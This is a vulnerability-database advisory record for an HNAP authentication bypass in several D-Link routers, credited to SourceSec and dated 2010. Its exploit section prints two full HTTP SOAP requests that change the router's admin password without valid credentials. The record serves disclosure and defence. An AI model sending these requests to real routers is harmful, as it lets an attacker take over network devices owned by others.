ID

VAR-E-201001-1162


TITLE

D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability

Trust: 0.3

sources: BID: 37690

DESCRIPTION

Multiple D-Link routers are prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to bypass security restrictions and access certain administrative functions.
This issue affects the following routers:
DI-524
DIR-628
DIR-655

Trust: 0.3

sources: BID: 37690

AFFECTED PRODUCTS

vendor: d link, model: dir-655, scope: eq, version: 0

Trust: 0.3

vendor: d link, model: dir-628, scope: eq, version: 0

Trust: 0.3

vendor: d link, model: di-524, scope: eq, version: 0

Trust: 0.3

sources: BID: 37690

EXPLOIT

An attacker can exploit this issue by using readily available network utilities.
The following example requests are available:
Example 1:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
Content-Length: 453

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>
Example 2:
POST /HNAP1/ HTTP/1.1
Authorization: Basic dXNlcjo=
Host: 192.168.0.1
SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
Content-Length: 453

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>

Trust: 0.3

sources: BID: 37690

PRICE

Free

Trust: 0.3

sources: BID: 37690

TYPE

Design Error

Trust: 0.3

sources: BID: 37690

CREDITS

SourceSec Security Research

Trust: 0.3

sources: BID: 37690

EXTERNAL IDS

db: BID, id: 37690

Trust: 0.3

sources: BID: 37690

REFERENCES

url: http://www.sourcesec.com/lab/dlink_hnap_captcha.pdf

Trust: 0.3

url: http://www.dlink.com/

Trust: 0.3

sources: BID: 37690

SOURCES

db: BID, id: 37690

LAST UPDATE DATE

2022-07-27T09:55:00.611000+00:00


SOURCES UPDATE DATE

db: BID, id: 37690, date: 2010-01-11T17:51:00

SOURCES RELEASE DATE

db: BID, id: 37690, date: 2010-01-09T00:00:00